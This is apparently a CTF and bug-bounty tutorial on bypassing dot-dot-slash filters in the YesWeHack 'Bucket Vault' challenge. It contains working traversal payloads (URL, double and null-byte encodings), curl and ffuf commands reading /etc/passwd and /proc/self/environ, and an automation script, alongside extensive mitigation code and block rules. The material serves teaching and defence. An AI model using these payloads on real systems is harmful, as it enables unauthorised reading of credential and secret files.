
Introduction:
Path traversal (also known as directory traversal) is a web security vulnerability that allows attackers to access files outside the intended directory by manipulating file paths with `../` (dot-dot-slash) sequences. While many developers implement simple filters to block or remove these patterns, skilled attackers can bypass such protections using encoding tricks, absolute paths, or unconventional delimiters. This article dissects the YesWeHack Dojo challenge “Bucket Vault,” where you must bypass a dot-dot-slash filter to read a secret file—a perfect hands-on lesson for bug bounty hunters and CTF players.
Learning Objectives:
- Understand how path traversal vulnerabilities arise and why dot-dot-slash filters often fail.
- Master multiple bypass techniques including URL encoding, double encoding, and alternative path representations.
- Apply these techniques to exploit a realistic CTF challenge and read sensitive files.
You Should Know:
1. Understanding Path Traversal and the Dot-Dot-Slash Filter
Path traversal occurs when an application uses user-supplied input to construct a file path without proper sanitization. A typical vulnerable code snippet might look like this (PHP):
<?php
// Vulnerable: the attacker-controlled value is concatenated straight into the path
$file = $_GET['file'];
include('/var/www/uploads/' . $file);
An attacker can supply `../../../../etc/passwd` to escape the uploads directory. To counter this, developers often implement a filter that strips or blocks `../` sequences.
Step‑by‑step guide to testing basic traversal:
1. Identify any parameter that reads files (e.g., ?file=document.pdf).
2. Inject `../../../etc/passwd` (Linux) or `..\..\..\Windows\win.ini` (Windows).
3. Observe whether the server returns the file or an error.
Linux command to test via curl:
curl -v "http://target.com/view?file=../../../../etc/passwd"
Windows PowerShell equivalent:
Invoke-WebRequest -Uri "http://target.com/view?file=..\..\..\Windows\win.ini"
If blocked by a filter that simply removes `../` in a single, non-recursive pass, try nested sequences: `....//....//` becomes `../../` once each embedded `../` has been stripped. (A filter that strips repeatedly until nothing changes is not fooled by this; the encoding tricks below still are.)
2. Bypassing with URL Encoding and Double Encoding
Simple filters often look for the literal string `../`. URL encoding bypasses this when the filter inspects the raw, still-encoded value: `%2e%2e%2f` contains no `../`, but the web server or framework decodes it to `../` before the path is handed to the filesystem.
Common encoded variants:
– `%2e%2e%2f` → `../`
– `%2e%2e%5c` → `..\` (Windows)
– `..%2f` → `../` (partial encoding: only the slash is encoded)
– `%2e%2e/` → `../` (mixed encoding: only the dots are encoded)
Step‑by‑step guide:
1. Take the payload `../../etc/passwd`.
2. Replace each dot with `%2e` and each slash with `%2f`: `%2e%2e%2f%2e%2e%2fetc%2fpasswd`.
3. Send the request and check for success.
Double encoding (if the server decodes once, then applies the filter, and the application decodes again before using the value):
First encode `../` to `%2e%2e%2f`, then encode the `%` signs of that string again: `%252e%252e%252f`. The first decode yields `%2e%2e%2f`, which the filter does not recognise; the second decode turns it into `../`. Filters that run after exactly one decode miss this.
Curl example for double encoding:
curl "http://target.com/view?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd"
Burp Suite configuration: Use the “Payload Processing” rules to add URL encoding and double encoding automatically.
3. Advanced Bypass Techniques: Absolute Paths, Null Bytes, and More
When `../` is blocked, an absolute path can work if the application does not prepend a base directory, or joins paths with a function that discards the base when the second part is absolute. Supplying `/etc/passwd` contains no `../` at all, so the filter passes it untouched. Additionally, null byte injection (%00) can terminate strings early in older PHP versions.
Step‑by‑step for absolute paths:
1. Instead of `../`, try `/etc/passwd` or `c:\windows\win.ini`.
2. If the server prepends a base folder (e.g., /var/www/uploads/) by plain string concatenation, the result is `/var/www/uploads/etc/passwd` and the request fails. Path-joining functions behave differently: Python's os.path.join() and Node's path.resolve() both discard the base when the user-supplied part is absolute, and some misconfigured handlers prepend nothing at all.
Null byte injection (legacy PHP < 5.3.4):
curl "http://target.com/view?file=../../../../etc/passwd%00.jpg"
The `%00` truncates the `.jpg` extension, allowing the traversal to succeed.
Alternative representations:
- Overlong UTF-8 (“Unicode”) variants such as `..%c0%af` or `%c0%ae%c0%ae%c0%af`, which decode to `../` in parsers that accept non-shortest-form UTF-8 (historically IIS; rare today, but worth one request).
- Backslashes when the filter only blocks forward slashes: `..\..\etc\passwd`. This helps only against a Windows backend or an application that normalises separators; on Linux a backslash is an ordinary filename character, not a directory separator.
Windows-specific bypass: mix the separators, e.g. `..\../..\Windows\System32\drivers\etc\hosts`, since Windows accepts both `/` and `\` and a filter frequently checks for only one of them.
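The filter weaknesses described in sections 1 to 3 (a single-pass strip of `../`, a filter that runs on the raw value before decoding, an application that decodes a second time, NUL truncation and absolute-path joining) can be reproduced offline. The following Python model is an added example, not code from the Dojo challenge or from YesWeHack; the handler it simulates, its stage flags and the base directory /var/www/uploads are assumptions chosen to mirror the PHP snippet in section 1:

```python
import posixpath
import urllib.parse

# Assumed base directory, mirroring the PHP snippet in section 1.
BASE = "/var/www/uploads"


def naive_filter(value: str) -> str:
    """The blocklist the article warns about: remove every literal '../' in one pass."""
    return value.replace("../", "")


def vulnerable_resolve(raw_value: str, filter_on_raw: bool = False,
                       app_decodes_again: bool = False, extension: str = ".jpg") -> str:
    """Model of a vulnerable download handler (constructed, not the Dojo's real code).

    Pipeline: [filter on raw] -> URL-decode (web server) -> [filter on decoded]
              -> [second decode by the application] -> NUL truncation (PHP < 5.3.4)
              -> append a fixed extension -> join onto BASE and normalise.
    Returns the filesystem path the handler would finally open.
    """
    value = raw_value
    if filter_on_raw:
        value = naive_filter(value)          # filter never sees decoded characters
    value = urllib.parse.unquote(value)      # one decode, done by the server/framework
    if not filter_on_raw:
        value = naive_filter(value)          # filter runs after exactly one decode
    if app_decodes_again:
        value = urllib.parse.unquote(value)  # e.g. urldecode() called on a decoded value
    if "\0" in value:
        value = value.split("\0", 1)[0]      # C-string truncation drops the extension
    else:
        value += extension
    # posixpath.join discards BASE when value is absolute: the absolute-path bypass
    return posixpath.normpath(posixpath.join(BASE, value))


def escapes_base(resolved: str) -> bool:
    """True when the resolved path lies outside BASE."""
    return not resolved.startswith(BASE + "/")


# Constructed payloads: one per bypass technique discussed above.
PAYLOADS = {
    "plain (blocked)": ("../../../etc/passwd%00", dict()),
    "nested ....//": ("....//....//....//etc/passwd%00", dict()),
    "single encoding": ("%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00", dict(filter_on_raw=True)),
    "double encoding": ("%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%2500",
                        dict(app_decodes_again=True)),
    "absolute path": ("/etc/passwd%00", dict()),
}


def run_all() -> dict:
    """Resolve every payload; map name -> (final path, escaped BASE?)."""
    results = {}
    for name, (raw, flags) in PAYLOADS.items():
        path = vulnerable_resolve(raw, **flags)
        results[name] = (path, escapes_base(path))
    return results


if __name__ == "__main__":
    for name, (path, escaped) in run_all().items():
        print(f"{name:16} -> {path:30} {'ESCAPED' if escaped else 'contained'}")
```

Only the "plain" payload stays inside the upload directory; the same single-encoded payload is also contained when the filter runs after the decode (the default flags), which is why the stage at which a filter runs matters more than the filter's pattern list.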
4. Practical Exploitation: Reading the Secret File on Bucket Vault
The YesWeHack Dojo challenge “Bucket Vault” simulates a web application that filters `../` but fails to account for encoding. The goal is to read a secret file (e.g., `secret.txt` or flag.txt) located outside the web root.
Step‑by‑step exploitation using manual and automated methods:
1. Enumerate the parameter – Look for parameters like ?page=, ?doc=, ?file=, ?path=. Use a tool like `ffuf` to fuzz common parameter names, filtering on response size so that the one parameter that changes the page stands out:
ffuf -u "http://dojo.yeswehack.com/bucket-vault?FUZZ=test" -w /usr/share/wordlists/param.txt
2. Test simple traversal – Confirm the filter blocks `../../../etc/passwd` (returns 403 or a sanitized error).
3. Apply URL encoding – Send %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd. If successful, the server returns the file.
4. Locate the secret file – The challenge description mentions a “secret file.” Common locations are /secret.txt, /var/secret/flag.txt, or environment variables. Use traversal to read `/proc/self/environ` (Linux) for clues:
curl "http://dojo.yeswehack.com/bucket-vault?file=%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron"
5. If filtered again, double encode – send the `%252e%252e%252f` variant of the same payload.
Python script to automate the encoding bypass (it uses http.client rather than requests on purpose: requests re-encodes `%` in a params dict and, even when given a pre-built URL, decodes `%2e` back to `.` before sending, so neither the single- nor the double-encoded payload would reach the server as intended):
import http.client
import urllib.parse

host = "dojo.yeswehack.com"
path = "/bucket-vault"
param = "file"
targets = ["../../../etc/passwd", "../../../../flag.txt", "../../../secret.txt"]


def fetch(raw_value):
    # http.client sends the request line verbatim, so percent-escapes stay as written
    conn = http.client.HTTPConnection(host, timeout=10)
    conn.request("GET", f"{path}?{param}={raw_value}")
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, body


for t in targets:
    # Single URL encode: every '.' and '/' becomes %2e / %2f
    encoded = urllib.parse.quote(t, safe="")
    status, body = fetch(encoded)
    if "flag" in body or "secret" in body:
        print(f"Found: {t}\n{body[:200]}")
        break
    # Double encode: the '%' signs become %25, for filters that decode only once
    double = urllib.parse.quote(encoded, safe="")
    status, body = fetch(double)
    if "flag" in body:
        print(f"Found with double: {t}\n{body[:200]}")
        break
5. Mitigation Strategies for Developers and Hardening Cloud Storage
Preventing path traversal requires a defense-in-depth approach. For the “Bucket Vault” (likely referencing an S3‑like bucket), apply these mitigations:
Step‑by‑step developer guide:
1. Use allowlists – Never accept user input as a path. Map the requested name to an allowlist of permitted files and refuse anything else:
ALLOWED = {"doc1.pdf", "doc2.pdf"}
if file not in ALLOWED:
    raise FileNotFoundError(file)  # map to an HTTP 404
2. Canonicalize, then compare – Resolve the absolute path (following symlinks) and verify that it lies inside the intended base directory. Compare with os.path.commonpath() or with the base plus a trailing separator; a bare startswith(base) accepts `/var/www/uploads2`:
import os
base = os.path.realpath("/var/www/uploads")
user_path = os.path.realpath(os.path.join(base, file))
if os.path.commonpath([base, user_path]) != base:
    raise PermissionError
3. Disable dangerous functions – In PHP, never pass user input to include()/require(); serve files with readfile() only after a realpath() check like the one above. In Node.js, path.normalize() removes `../` segments but does not confine the result: use path.resolve(base, file) and verify the result starts with base + path.sep.
4. For cloud buckets (AWS S3, GCS) – Never let a request parameter become an object key or part of one. Issue pre‑signed URLs for keys the server chose itself, and scope the application's IAM permissions to a fixed key prefix (see section 7). A bucket policy cannot “deny `../`”: to S3 an object key is a flat string in which `..` has no special meaning, so the protection has to be in how the key is built.
Windows IIS hardening: as defense in depth only (this is a blocklist, and the sections above show how those fail), reject requests whose query string contains a dot-dot sequence with a URL Rewrite rule. `match url` sees only the path, so the query string is checked in a condition:
<rule name="BlockDotDotSlash" stopProcessing="true">
  <match url=".*" />
  <conditions>
    <add input="{QUERY_STRING}" pattern="(\.\.|%2e%2e|%252e%252e)" ignoreCase="true" />
  </conditions>
  <action type="AbortRequest" />
</rule>
Linux Apache example: the same idea with `mod_rewrite`. %{QUERY_STRING} is matched undecoded, so the encoded forms must be listed explicitly:
RewriteEngine On
RewriteCond %{QUERY_STRING} (\.\./|%2e%2e%2f|%252e%252e%252f) [NC]
RewriteRule .* - [F,L]
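A complete version of the canonicalisation check from step 2 above, written as an added example (not the page's or any project's code), shows the two mistakes that usually undermine it: comparing with a plain startswith(), which accepts a sibling directory whose name merely begins with the base (/var/www/uploads2), and normalising the string without realpath(), which ignores symlinks. The temporary directory layout, the file names and the helper names are constructed for the demonstration:

```python
import os
import tempfile


def safe_path(base: str, user_input: str) -> str:
    """Return the canonical absolute path of user_input inside base, or raise.

    - No URL decoding here: the web framework already decoded the parameter once,
      and decoding again is exactly what makes double-encoded payloads work.
    - realpath() follows symlinks, so a link inside base pointing outside is caught.
    - Containment is tested with commonpath(), not startswith(): the latter accepts
      '/var/www/uploads2/x' as being under '/var/www/uploads'.
    """
    if "\0" in user_input:
        raise ValueError("NUL byte in path")
    real_base = os.path.realpath(base)
    # join() discards real_base when user_input is absolute; realpath() then
    # resolves '..' and symlinks, so the containment check sees the final target.
    candidate = os.path.realpath(os.path.join(real_base, user_input))
    if candidate == real_base or os.path.commonpath([real_base, candidate]) != real_base:
        raise PermissionError(f"path escapes base: {candidate}")
    return candidate


def naive_check(base: str, user_input: str) -> bool:
    """The weak check many handlers ship: normpath() plus startswith(). True means 'allowed'."""
    real_base = os.path.realpath(base)
    candidate = os.path.normpath(os.path.join(real_base, user_input))
    return candidate.startswith(real_base)


def build_demo_tree() -> tuple:
    """Constructed layout: <tmp>/uploads/ok.txt, <tmp>/uploads2/secret.txt and, where
    the platform allows it, a symlink <tmp>/uploads/link -> ../uploads2/secret.txt.
    Returns (uploads_dir, symlink_created)."""
    root = tempfile.mkdtemp(prefix="traversal-demo-")
    uploads = os.path.join(root, "uploads")
    sibling = os.path.join(root, "uploads2")
    os.makedirs(uploads)
    os.makedirs(sibling)
    with open(os.path.join(uploads, "ok.txt"), "w") as fh:
        fh.write("public document\n")
    with open(os.path.join(sibling, "secret.txt"), "w") as fh:
        fh.write("not for download\n")
    try:
        os.symlink(os.path.join("..", "uploads2", "secret.txt"), os.path.join(uploads, "link"))
        symlink_created = True
    except (OSError, NotImplementedError):
        symlink_created = False
    return uploads, symlink_created


def evaluate(base: str, user_input: str) -> tuple:
    """Return (naive_verdict, safe_verdict); each is True when access would be allowed."""
    try:
        safe_path(base, user_input)
        safe_ok = True
    except (ValueError, PermissionError):
        safe_ok = False
    return naive_check(base, user_input), safe_ok


if __name__ == "__main__":
    uploads, has_link = build_demo_tree()
    probes = ["ok.txt", "../../../../etc/passwd", "/etc/passwd",
              "../uploads2/secret.txt", "link", "ok.txt\0.jpg"]
    for probe in probes:
        naive_ok, safe_ok = evaluate(uploads, probe)
        print(f"{probe!r:28} naive={naive_ok!s:5} safe={safe_ok}")
```

Both checks reject the obvious `../../../../etc/passwd` and `/etc/passwd`; only the commonpath/realpath version rejects the sibling directory, the symlink and the NUL-terminated name, which is the difference between a check that merely survives a quick test and one that holds up.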
6. Using Automated Tools for Detection in Bug Bounty
When hunting path traversal vulnerabilities on bug bounty programs, automation speeds up testing across hundreds of endpoints.
Step‑by‑step with popular tools:
1. Burp Suite Intruder – Send a request with a `§payload§` marker in the parameter value. Load a payload list of traversal strings (including encoded variants). Sort the results by response length or status code, or use the “Grep – Extract” feature to pull out a telltale string such as `root:x:0:0`; anomalies indicate success.
2. FFUF with a custom wordlist. Create the traversal wordlist, then fuzz the parameter, filtering out the blocked and empty responses:
echo -e "../../../etc/passwd\n%2e%2e%2f%2e%2e%2fetc%2fpasswd\n..%252f..%252f..%252fetc%252fpasswd" > traversal.txt
ffuf -u "https://target.com/view?file=FUZZ" -w traversal.txt -fc 403,404 -fs 0
3. Nuclei template – Use the default path traversal templates:
nuclei -u https://target.com -t ~/nuclei-templates/exposures/configs/path-traversal.yaml
API security note: GraphQL endpoints often have `file` or `path` arguments. Test the same payloads in GraphQL mutations and queries. REST APIs with file download functionality (e.g., /api/download?file=report.pdf) are prime targets.
7. Cloud Hardening for S3 Buckets (Bucket Vault Context)
The name “Bucket Vault” suggests a cloud storage scenario. To S3 itself an object key is a flat string and `..` has no special meaning, so the bucket does not “traverse”; the exposure arises when a web application lets user input select the whole key (or everything after a prefix), or passes the key through a URL or path layer that collapses `..` before the storage call. In that situation the attacker can read any object the application's credentials can reach.
Step‑by‑step cloud hardening:
1. Never construct S3 keys directly from user input – Use a lookup table or a deterministic mapping (e.g., a UUID that the server resolves to the real key).
2. Scope the credentials – Give the application (through its IAM role, or through Cognito identity pool roles for end users) only `s3:GetObject` on the prefix it is meant to serve, so that even a key-construction bug cannot reach other objects.
3. Example of a vulnerable S3 proxy in Node.js with AWS SDK v2 (do not use):
app.get('/file', (req, res) => {
  const key = req.query.key;   // user supplies "secret/../../config" or any other key
  s3.getObject({ Bucket: 'my-bucket', Key: key }).createReadStream().pipe(res);
});
Fix: do not strip `..` (`key.replace(/\.\./g, '')` is a blocklist that silently rewrites legitimate names such as `report..v2.pdf` and does nothing about encoded forms that a later layer decodes). Instead validate the name against an allowlist pattern such as `/^[A-Za-z0-9._-]+$/`, reject anything else, and build the key yourself as `'public/' + name`.
4. Use VPC Endpoints and Bucket Policies – Restrict what the application's principal can read to the intended prefix. A `Deny` keyed on `..` in the object key is not expressible for GetObject (`s3:prefix` is a ListBucket condition key), so constrain the Resource instead (account ID and role name below are placeholders):
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": { "AWS": "arn:aws:iam::123456789012:role/bucket-vault-app" },
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::bucket-vault/public/*"
  }]
}
What Undercode Say:
- Key Takeaway 1: Simple string replacement of `../` is never sufficient; attackers have dozens of encoding and representation tricks to bypass filters.
- Key Takeaway 2: Always canonicalize the path and compare it against a trusted base directory – this is the only reliable defense against path traversal.
Analysis: The “Bucket Vault” challenge mirrors real-world bug bounty findings where cloud storage proxies and file download endpoints remain vulnerable years after the initial disclosure of these techniques. Developers often overlook double encoding or assume that a simple `str_replace` protects them. For penetration testers, mastering these bypasses is essential – they appear in over 30% of web application assessments. Moreover, with the rise of serverless functions (AWS Lambda, Azure Functions) that handle file paths, the same traversal risks now extend to cloud-native environments. The lesson is clear: treat all user input as malicious and validate using allowlists and filesystem resolution, not blacklists.
Prediction:
Path traversal vulnerabilities will continue to plague cloud object storage integrations as developers race to build file‑sharing features. The next evolution will involve AI‑generated bypass payloads that combine multiple encodings and Unicode homoglyphs, making traditional filters obsolete. Expect to see more “Bucket Vault” style CTF challenges and real incidents where S3 buckets are traversed to access IAM credentials or Lambda source code. Mitigation will shift toward zero‑trust file access where every request must be explicitly allowed via temporary pre‑signed URLs – eliminating user‑controlled paths entirely.
Reported By: Bugbounty Ctf – Hackers Feeds


